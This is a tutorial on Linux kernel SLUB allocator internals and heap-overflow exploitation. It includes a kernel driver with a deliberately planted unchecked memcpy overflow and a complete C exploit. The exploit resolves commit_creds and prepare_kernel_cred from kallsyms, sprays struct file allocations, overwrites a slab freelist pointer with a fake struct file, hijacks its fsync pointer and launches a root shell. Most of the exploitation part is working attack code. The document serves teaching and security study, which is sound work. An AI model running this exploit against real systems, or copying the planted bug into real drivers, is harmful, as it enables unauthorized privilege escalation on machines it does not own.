1. Introduction:
In recent years, a good deal of research has been done on Linux kernel security. The most common kernel privilege-escalation vulnerabilities fall into several categories: NULL pointer dereference, kernel stack overflow, kernel slab overflow, race conditions, and so on.
Some of them are fairly easy to exploit and do not require your own Linux kernel debugging environment to write the exploit; others require specific knowledge of Linux kernel design, routines, memory management, and so on.
In this tutorial we explain how the SLUB allocator works and how corrupting some of the slab allocator's metadata can get our user-land code executed.
2. The Slab Allocator:
The Linux kernel has three main memory allocators: SLAB, SLUB, and SLOB.
Note that “slab” refers to the general allocator design, while SLAB, SLUB, and SLOB are slab implementations in the Linux kernel.
Only one of them can be used at a time; it is selected when the kernel is built. SLUB has been the default since the 2.6 series, so it is the allocator behind a kernel developer's calls to kmalloc().
So let’s talk a little bit about these three implementations and describe how they work.
2.1. SLAB allocator:
A slab is a set of one or more contiguous pages of memory handled by the slab allocator for an individual cache. Each cache is responsible for allocating one specific kernel structure, so a slab is a set of objects of the same type.
In the SLAB implementation, a slab is described by the following structure:
```c
struct slab {
    union {
        struct {
            struct list_head list;
            unsigned long colouroff;
            void *s_mem;
            unsigned int inuse;     /* num of used objects */
            kmem_bufctl_t free;
            unsigned short nodeid;
        };
        struct slab_rcu __slab_cover_slab_rcu;
    };
};
```
For example, if the kernel allocates two task_struct objects, both are served from the same slab cache, because they have the same type and size.
Figure: two pages holding six objects of the same type, handled by one slab cache.
2.2. SLUB allocator:
SLUB is currently the default slab allocator in the Linux kernel. It was implemented to solve some drawbacks of the SLAB design.
The following listing shows the most important members of the page structure as SLUB uses it (see the kernel source for the full definition).
```c
struct page {
    ...
    struct {
        union {
            pgoff_t index;          /* Our offset within mapping. */
            void *freelist;         /* slub first free object */
        };
        ...
        struct {
            unsigned inuse:16;
            unsigned objects:15;
            unsigned frozen:1;
        };
        ...
    };
    ...
    union {
        ...
        struct kmem_cache *slab;    /* SLUB: Pointer to slab */
        ...
    };
    ...
};
```
A page’s freelist pointer points to the first free object in the slab. That free object holds a small header of its own with another freelist pointer, which points to the next free object in the slab. The inuse field keeps track of the number of objects that have been allocated. The figure illustrates this:
Figure: the SLUB allocator, with free objects chained in a linked list.
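To make the linked list of free objects concrete, here is a minimal user-space sketch of the idea. It is a toy model, not kernel code: the names toy_slab, toy_alloc and toy_free, and the sizes OBJ_SIZE and OBJ_COUNT, are made up for illustration, and the real SLUB adds per-CPU lists and other details that are left out here.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

#define OBJ_SIZE  64   /* hypothetical object size */
#define OBJ_COUNT 4    /* hypothetical number of objects per slab */

/* Toy model of a single slab (illustration only). */
struct toy_slab {
    unsigned char mem[OBJ_SIZE * OBJ_COUNT]; /* the objects themselves */
    void *freelist;                          /* first free object, or NULL */
    unsigned inuse;                          /* objects currently allocated */
};

/* Chain every object: each free object stores the address of the
 * next free object in its first bytes; the last one stores NULL. */
static void toy_slab_init(struct toy_slab *s)
{
    for (size_t i = 0; i < OBJ_COUNT; i++) {
        void *next = NULL;
        if (i + 1 < OBJ_COUNT)
            next = s->mem + (i + 1) * OBJ_SIZE;
        memcpy(s->mem + i * OBJ_SIZE, &next, sizeof(next));
    }
    s->freelist = s->mem;
    s->inuse = 0;
}

/* Pop the first free object; the pointer stored inside it becomes
 * the new head of the free list. Returns NULL when the slab is full. */
static void *toy_alloc(struct toy_slab *s)
{
    void *obj = s->freelist;

    if (obj == NULL)
        return NULL;
    memcpy(&s->freelist, obj, sizeof(s->freelist));
    s->inuse++;
    return obj;
}

/* Push an object back: it becomes the head and points at the old head. */
static void toy_free(struct toy_slab *s, void *obj)
{
    assert(s->inuse > 0);
    memcpy(obj, &s->freelist, sizeof(s->freelist));
    s->freelist = obj;
    s->inuse--;
}
```

After toy_slab_init(), successive toy_alloc() calls hand out the objects in address order, and a freed object is the first one to be handed out again, because it is pushed onto the head of the list.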
The SLUB allocator manages most of the kernel's dynamic allocations and deallocations of internal memory. The kernel sorts these allocations by size;
the size-based caches are called general-purpose caches (for example, kmalloc-192 holds allocations between 129 and 192 bytes). If you call kmalloc() to allocate 50 bytes, the chunk comes from the general-purpose cache kmalloc-64, because 50 is greater than 32 and at most 64.
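The size-to-cache mapping described above can be sketched as a small lookup. This is a simplified model, assuming the common set of general-purpose sizes (powers of two plus 96 and 192); the real table depends on the kernel version and architecture, and the name toy_kmalloc_class is hypothetical.

```c
#include <stddef.h>

/* Assumed general-purpose size classes (simplified, illustration only). */
static const size_t toy_kmalloc_sizes[] = {
    8, 16, 32, 64, 96, 128, 192, 256, 512, 1024, 2048, 4096, 8192
};

/* Return the object size of the smallest class that can hold `size`
 * bytes, or 0 if the request is zero or larger than the biggest
 * class modelled here. */
static size_t toy_kmalloc_class(size_t size)
{
    size_t n = sizeof(toy_kmalloc_sizes) / sizeof(toy_kmalloc_sizes[0]);

    if (size == 0)
        return 0;
    for (size_t i = 0; i < n; i++) {
        if (size <= toy_kmalloc_sizes[i])
            return toy_kmalloc_sizes[i];
    }
    return 0;
}
```

With this model, a 50-byte request maps to the 64-byte class and a 256-byte request maps to the 256-byte class, which matches the kmalloc-64 and kmalloc-256 examples in the text.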
For more details, you can run “cat /proc/slabinfo”.
On recent kernels, /proc/slabinfo is no longer readable by an unprivileged user, so you need super-user access while writing exploits.
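If you prefer to read these numbers from a program, the sketch below parses one data line of /proc/slabinfo. It assumes the version 2.x layout, where each line starts with the cache name followed by the active_objs, num_objs and objsize columns; the struct and function names are made up for this example.

```c
#include <stdio.h>

/* The first four columns of a /proc/slabinfo data line. */
struct slab_stats {
    char name[64];
    unsigned long active_objs;  /* objects currently in use */
    unsigned long num_objs;     /* total objects in the cache's slabs */
    unsigned long objsize;      /* size of one object in bytes */
};

/* Parse one line of the assumed form
 *   name <active_objs> <num_objs> <objsize> ...
 * Returns 1 on success and 0 when the line does not match,
 * which is the case for the two header lines. */
static int parse_slabinfo_line(const char *line, struct slab_stats *out)
{
    return sscanf(line, "%63s %lu %lu %lu",
                  out->name, &out->active_objs,
                  &out->num_objs, &out->objsize) == 4;
}

/* Objects that exist in the cache's slabs but are currently free. */
static unsigned long slab_free_objs(const struct slab_stats *st)
{
    return st->num_objs - st->active_objs;
}
```

Feeding it each line read with fgets() from /proc/slabinfo (as root) and keeping the entry whose name is "kmalloc-256" gives the used and free object counts for that cache.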
2.3. SLOB allocator:
The SLOB allocator was designed for small systems with limited amounts of memory, such as embedded Linux systems.
SLOB places all allocated objects on pages arranged in three linked lists.
3. Kernel SLUB overflow:
Exploiting SLUB overflows requires some knowledge of the SLUB allocator (described above), and it is one of the more advanced exploitation techniques.
Keep in mind that objects in a slab are allocated contiguously, so an overflow in one object runs into its neighbour. If we can overwrite the metadata used by the SLUB allocator, we can redirect the execution flow into user space and run our evil code. Our goal is therefore to control the freelist pointer which, as described above, points to the next free object in the slab. If freelist is NULL, the slab is full: no more free objects are available, and the kernel asks for a new slab of PAGE_SIZE bytes (PAGE_SIZE = 4096). If we overwrite this pointer with an address of our choice, a later allocation on some kernel path will be handed that arbitrary address (for example, one in user-land).
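The effect of contiguous objects can be reproduced safely in user space. The following sketch models two neighbouring 256-byte objects in one buffer, where the second one is free and keeps its next-free pointer in its first bytes. All names (toy_pair, toy_unchecked_write, and so on) are hypothetical, and the copy is capped at the size of the toy buffer so the demonstration itself never writes out of bounds.

```c
#include <stddef.h>
#include <string.h>

#define OBJ_SIZE 256   /* same size as the kmalloc-256 example */

/* Object 0 is "allocated"; object 1 is "free" and stores the
 * next-free pointer in its first bytes. */
struct toy_pair {
    unsigned char mem[2 * OBJ_SIZE];
};

/* Store the next-free pointer inside object 1. */
static void toy_set_next(struct toy_pair *p, void *next)
{
    memcpy(p->mem + OBJ_SIZE, &next, sizeof(next));
}

/* Read the next-free pointer back from object 1. */
static void *toy_get_next(const struct toy_pair *p)
{
    void *next;

    memcpy(&next, p->mem + OBJ_SIZE, sizeof(next));
    return next;
}

/* Copy `len` bytes into object 0 without comparing `len` to OBJ_SIZE,
 * which mirrors an unchecked memcpy(). Bytes beyond OBJ_SIZE land in
 * object 1. The cap only keeps this model inside its own buffer. */
static void toy_unchecked_write(struct toy_pair *p, const void *src, size_t len)
{
    if (len > sizeof(p->mem))
        len = sizeof(p->mem);
    memcpy(p->mem, src, len);
}
```

Writing exactly OBJ_SIZE bytes leaves the neighbour's pointer untouched, while writing OBJ_SIZE + sizeof(void *) bytes replaces it with whatever the last bytes of the input contain.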
So let’s make a small demonstration and look at this in a more practical way. I’ve built a vulnerable device driver that performs some trivial input/output with user-land processes.
The code:
```c
#include <linux/init.h>
#include <linux/module.h>
#include <linux/uaccess.h>
#include <linux/cdev.h>
#include <linux/fs.h>
#include <linux/slab.h>

#define DEVNAME "vuln"
#define MAX_RW (PAGE_SIZE*2)

MODULE_AUTHOR("Mohamed Ghannam");
MODULE_LICENSE("GPL v2");

static struct cdev *cdev;
static char *ramdisk;
static int vuln_major = 700, vuln_minor = 3;
static dev_t first;
static int count = 1;

static int vuln_open_dev(struct inode *inode, struct file *file)
{
    static int counter = 0;
    char *ramdisk;

    printk(KERN_INFO "opening device : %s \n", DEVNAME);
    ramdisk = kzalloc(MAX_RW, GFP_KERNEL);
    if (!ramdisk)
        return -ENOMEM;
    //file->private_data = ramdisk;
    printk(KERN_INFO "MAJOR no = %d and MINOR no = %d\n", imajor(inode), iminor(inode));
    printk(KERN_INFO "Opened device : %s\n", DEVNAME);
    counter++;
    printk(KERN_INFO "opened : %d\n", counter);
    return 0;
}

static int vuln_release_dev(struct inode *inode, struct file *file)
{
    printk(KERN_INFO "closing device : %s \n", DEVNAME);
    return 0;
}

static ssize_t vuln_write_dev(struct file *file, const char __user *buf,
                              size_t lbuf, loff_t *ppos)
{
    int nbytes, i;
    char *copy;
    /* Sized from the user-supplied length, so this copy is safe. */
    char *ramdisk = kzalloc(lbuf, GFP_KERNEL);

    if (!ramdisk)
        return -ENOMEM;
    /* Fixed 256-byte buffer, served from kmalloc-256. */
    copy = kmalloc(256, GFP_KERNEL);
    if (!copy)
        return -ENOMEM;
    if ((lbuf + *ppos) > MAX_RW) {
        printk(KERN_WARNING "Write Abort \n");
        return 0;
    }
    nbytes = lbuf - copy_from_user(ramdisk + *ppos, buf, lbuf);
    ppos += nbytes;
    for (i = 0; i < 0x40; i++)
        copy[i] = 0xCC;
    /* Intentional bug: lbuf is never checked against the 256 bytes of copy. */
    memcpy(copy, ramdisk, lbuf);
    printk("ramdisk : %s \n", ramdisk);
    printk("Writing : bytes = %d\n", (int)lbuf);
    return nbytes;
}

static ssize_t vuln_read_dev(struct file *file, char __user *buf,
                             size_t lbuf, loff_t *ppos)
{
    int nbytes;
    char *ramdisk = file->private_data;

    if ((lbuf + *ppos) > MAX_RW) {
        printk(KERN_WARNING "Read Abort \n");
        return 0;
    }
    nbytes = lbuf - copy_to_user(buf, ramdisk + *ppos, lbuf);
    *ppos += nbytes;
    return nbytes;
}

static struct file_operations fps = {
    .owner = THIS_MODULE,
    .open = vuln_open_dev,
    .release = vuln_release_dev,
    .write = vuln_write_dev,
    .read = vuln_read_dev,
};

static int __init vuln_init(void)
{
    ramdisk = kmalloc(MAX_RW, GFP_KERNEL);
    first = MKDEV(vuln_major, vuln_minor);
    register_chrdev_region(first, count, DEVNAME);
    cdev = cdev_alloc();
    cdev_init(cdev, &fps);
    cdev_add(cdev, first, count);
    printk(KERN_INFO "Registring device %s\n", DEVNAME);
    return 0;
}

static void __exit vuln_exit(void)
{
    cdev_del(cdev);
    unregister_chrdev_region(first, count);
    kfree(ramdisk);
}

module_init(vuln_init);
module_exit(vuln_exit);
```
Let’s briefly describe what the code does. This is a dummy kernel module that creates a character device, “/dev/vuln”, and performs some basic I/O operations. The bug is easy to spot. In the vuln_write_dev() function, the ramdisk variable stores the user input and is allocated safely with lbuf, the length of the user input. The data is then copied into the copy variable, which is kmalloc’ed with only 256 bytes. So there is a SLUB heap overflow whenever a user writes more than 256 bytes.
First you should download the lab for this article. It is a QEMU system archive containing the kernel module, the proof of concept, and the final exploit. Let’s trigger the bug first:
So we’ve successfully overwritten the freelist pointer of the next free object.
If we overwrite this freelist metadata with the address of a user-land function, we can run that function in kernel mode, gain root privileges, and then drop to a shell.
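For contrast, the overflow disappears as soon as the length is checked against the size of the destination before copying. The sketch below shows that check in user-space C so it can be compiled and tested on its own; bounded_copy and COPY_SIZE are illustrative names, and in the driver the same comparison would sit before the memcpy() into copy.

```c
#include <errno.h>
#include <stddef.h>
#include <string.h>

#define COPY_SIZE 256   /* size of the destination buffer in the example */

/* Copy `len` bytes into a COPY_SIZE-byte buffer only when they fit.
 * Returns the number of bytes copied, or -EINVAL if the input is
 * longer than the destination. */
static long bounded_copy(unsigned char *dst, const void *src, size_t len)
{
    if (len > COPY_SIZE)
        return -EINVAL;
    memcpy(dst, src, len);
    return (long)len;
}
```

Rejecting the request is only one option; truncating len to COPY_SIZE would also keep the write inside the object, at the price of silently dropping data.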
Note that slabs fall into three categories: full, partial, and empty.
- Full slab: The slab is fully allocated and doesn’t contain any free chunks, so its freelist equals NULL.
- Partial slab: The slab contains both free and allocated chunks and can still serve further allocations.
- Empty slab: The slab doesn’t hold any allocation, so all of its chunks are free and ready to be allocated.
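The three categories follow directly from the inuse and objects counters shown earlier in struct page. As a small sketch (the enum and function names are made up for this example):

```c
/* The three slab states described in the list above. */
enum slab_state { SLAB_EMPTY, SLAB_PARTIAL, SLAB_FULL };

/* Classify a slab from the number of allocated objects (inuse)
 * and the total number of objects it can hold (objects). */
static enum slab_state classify_slab(unsigned inuse, unsigned objects)
{
    if (inuse == 0)
        return SLAB_EMPTY;
    if (inuse >= objects)
        return SLAB_FULL;
    return SLAB_PARTIAL;
}
```

For a slab that holds 16 objects, classify_slab(0, 16) is empty, classify_slab(5, 16) is partial, and classify_slab(16, 16) is full.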
4. Exploitation:
The difficulty is that an attacker who wants to overwrite a freelist pointer must take the slab’s state into account: it should be either a full slab or an empty slab. The attacker also needs to make sure that the next freelist pointer is the right target.
Our buffer is 256 bytes allocated with kmalloc, so we should look at /proc/slabinfo and gather some useful information about the general-purpose cache kmalloc-256. The next step is to compare the number of free and used objects in the slab cache, then fill the free ones so that the slab becomes full and the kernel has to create a fresh slab.
To do that, we need a way to trigger allocations in the general-purpose cache “kmalloc-256”, and a good target for this is the struct file kernel structure. Since we can’t allocate it directly from user space, we rely on syscalls that allocate it for us, such as open(), socket(), etc.
Calling these functions gives us struct file allocations, which is exactly what an attacker needs.
As described earlier, we should ensure that there are no more free chunks in the current slab, so we have to make a lot of struct file allocations:
```c
for (i = 0; i < 1000; i++)
    socket(AF_INET, SOCK_STREAM, 0);
```
Good, now take another look at the slab cache. The next thing to do is to trigger the crash. If we write more than 256 bytes, we overwrite the next freelist pointer, which lets us make the kernel execute user-space code of our choice. So how does user-land code get executed in kernel land? We have to look for function pointers, and fortunately struct file holds a pointer to a struct file_operations, which is a table of function pointers. Our attack is shown below:
```
struct file {
    .f_op = struct file_operations = {
        .fsync = ATTACKER_ADDRESS,
    };
};
```
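Why the table of function pointers matters can be seen in a small user-space model of the dispatch. The types below only imitate the shape of struct file and struct file_operations; toy_file, toy_file_ops and toy_do_fsync are hypothetical names, and the handlers are ordinary harmless functions.

```c
#include <stddef.h>

struct toy_file;

/* A table of operations, in the spirit of struct file_operations. */
struct toy_file_ops {
    int (*fsync)(struct toy_file *f);
};

/* An object that carries a pointer to its operations table. */
struct toy_file {
    const struct toy_file_ops *f_op;
    int synced;
};

/* Two interchangeable handlers with different return values. */
static int real_fsync(struct toy_file *f)
{
    f->synced = 1;
    return 0;
}

static int other_fsync(struct toy_file *f)
{
    f->synced = 0;
    return 42;
}

/* The call site dispatches through the table and has no idea
 * which function sits behind the pointer. */
static int toy_do_fsync(struct toy_file *f)
{
    if (f->f_op == NULL || f->f_op->fsync == NULL)
        return -1;
    return f->f_op->fsync(f);
}
```

The caller of toy_do_fsync() runs whatever the table says, so whoever controls the contents of the object, and therefore its f_op pointer, decides which function is executed.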
As you can see, there are a lot of function pointers, and you can choose any one you want. But how can we plant this “ATTACKER_ADDRESS”? The idea is to build a fake struct file and put its address in the payload, so that the freelist is overwritten with the address of our fake struct file. The freelist then points to our fake struct file, the allocator assumes that it is the next free object, and the control flow moves into user space. This is a powerful technique.
When the attacker calls the fsync(2) syscall, the code at ATTACKER_ADDRESS is executed instead of the real fsync operation. Good, so we can execute our user-land code, but how can we get root privileges? It’s very easy to get root by calling:
```c
commit_creds(prepare_kernel_cred(0));
```
The final exploit looks like this:
```c
#include <arpa/inet.h>
#include <errno.h>
#include <fcntl.h>
#include <netinet/in.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/ipc.h>
#include <sys/mman.h>
#include <sys/shm.h>
#include <sys/socket.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/utsname.h>
#include <unistd.h>

#define BUF_LEN 256

struct list_head {
    struct list_head *prev, *next;
};

struct path {
    void *mnt;
    void *dentry;
};

struct file_operations {
    void *owner;
    void *llseek;
    void *read;
    void *write;
    void *aio_read;
    void *aio_write;
    void *readdir;
    void *poll;
    void *unlocked_ioctl;
    void *compat_ioctl;
    void *mmap;
    void *open;
    void *flush;
    void *release;
    void *fsync;
    void *aio_fsync;
    void *fasync;
    void *lock;
    void *sendpage;
    void *get_unmapped_area;
    void *check_flags;
    void *flock;
    void *splice_write;
    void *splice_read;
    void *setlease;
    void *fallocate;
    void *show_fdinfo;
} op;

/* Fake struct file that the corrupted freelist will point to. */
struct file {
    struct list_head fu_list;
    struct path f_path;
    struct file_operations *f_op;
    long int buf[1024];
} file;

typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);

_commit_creds commit_creds;
_prepare_kernel_cred prepare_kernel_cred;
int win = 0;

/* Resolve a kernel symbol address from /proc/kallsyms, /proc/ksyms or System.map. */
static unsigned long get_kernel_sym(char *name)
{
    FILE *f;
    unsigned long addr;
    char dummy;
    char sname[512];
    struct utsname ver;
    int ret;
    int rep = 0;
    int oldstyle = 0;

    f = fopen("/proc/kallsyms", "r");
    if (f == NULL) {
        f = fopen("/proc/ksyms", "r");
        if (f == NULL)
            goto fallback;
        oldstyle = 1;
    }

repeat:
    ret = 0;
    while (ret != EOF) {
        if (!oldstyle)
            ret = fscanf(f, "%p %c %s\n", (void **)&addr, &dummy, sname);
        else {
            ret = fscanf(f, "%p %s\n", (void **)&addr, sname);
            if (ret == 2) {
                char *p;
                if (strstr(sname, "_O/") || strstr(sname, "_S."))
                    continue;
                p = strrchr(sname, '_');
                if (p > ((char *)sname + 5) && !strncmp(p - 3, "smp", 3)) {
                    p = p - 4;
                    while (p > (char *)sname && *(p - 1) == '_')
                        p--;
                    *p = '\0';
                }
            }
        }
        if (ret == 0) {
            fscanf(f, "%s\n", sname);
            continue;
        }
        if (!strcmp(name, sname)) {
            printf("[+] Resolved %s to %p%s\n", name, (void *)addr,
                   rep ? " (via System.map)" : "");
            fclose(f);
            return addr;
        }
    }

    fclose(f);
    if (rep)
        return 0;

fallback:
    /* didn't find the symbol, let's retry with the System.map */
    uname(&ver);
    if (strncmp(ver.release, "2.6", 3))
        oldstyle = 1;
    sprintf(sname, "/boot/System.map-%s", ver.release);
    f = fopen(sname, "r");
    if (f == NULL)
        return 0;
    rep = 1;
    goto repeat;
}

/* Runs in kernel mode once the hijacked fsync pointer is called. */
int getroot(void)
{
    win = 1;
    commit_creds(prepare_kernel_cred(0));
    return -1;
}

int main(int argc, char **argv)
{
    char *payload;
    int payload_len;
    void *ptr = &file;

    payload_len = 256 + 9;
    /* +1 leaves room for the terminating NUL written below. */
    payload = malloc(payload_len + 1);
    if (!payload) {
        perror("malloc");
        return -1;
    }
    memset(payload, 'A', payload_len);
    /* The bytes right after the 256-byte object overwrite the freelist pointer. */
    memcpy(payload + 256, &ptr, sizeof(ptr));
    payload[payload_len] = 0;

    int fd = open("/dev/vuln", O_RDWR);
    if (fd == -1) {
        perror("open ");
        return -1;
    }

    commit_creds = (_commit_creds)get_kernel_sym("commit_creds");
    prepare_kernel_cred = (_prepare_kernel_cred)get_kernel_sym("prepare_kernel_cred");

    /* Fill the partial slabs with struct file allocations. */
    int i;
    for (i = 0; i < 1000; i++) {
        if (socket(AF_INET, SOCK_STREAM, 0) == -1) {
            perror("socket fill ");
            return -1;
        }
    }

    write(fd, payload, payload_len);

    int target_fd;
    target_fd = socket(AF_INET, SOCK_STREAM, 0);
    target_fd = socket(AF_INET, SOCK_STREAM, 0);
    file.f_op = &op;
    op.fsync = &getroot;
    fsync(target_fd);

    pid_t pid = fork();
    if (pid == 0) {
        setsid();
        while (1) {
            sleep(9999);
        }
    }

    printf("[+] rooting shell ....");
    close(target_fd);
    if (win) {
        printf("OK\n[+] Droping root shell ... \n");
        execl("/bin/sh", "/bin/sh", NULL);
    } else
        printf("FAIL \n");
    return 0;
}
```
Let’s run the code:
Got root? Yes.
5. Conclusion:
We have studied how the kernel SLUB allocator works and how we can gain privileges by abusing it. Exploiting kernel vulnerabilities is not so different from exploiting user-space ones, but kernel exploit development requires a strong knowledge of how the kernel works, its routines, how it protects against race conditions, etc.
It was great fun to play with this kind of bug, as there are not many modern, public examples of SLUB overflow exploits.
Some references that might help you:
Linux Kernel CAN SLUB Overflow
A Guide to Kernel Exploitation: Attacking the Core
Exploit Linux Kernel Slub Overflow
w3challs kernelpanics section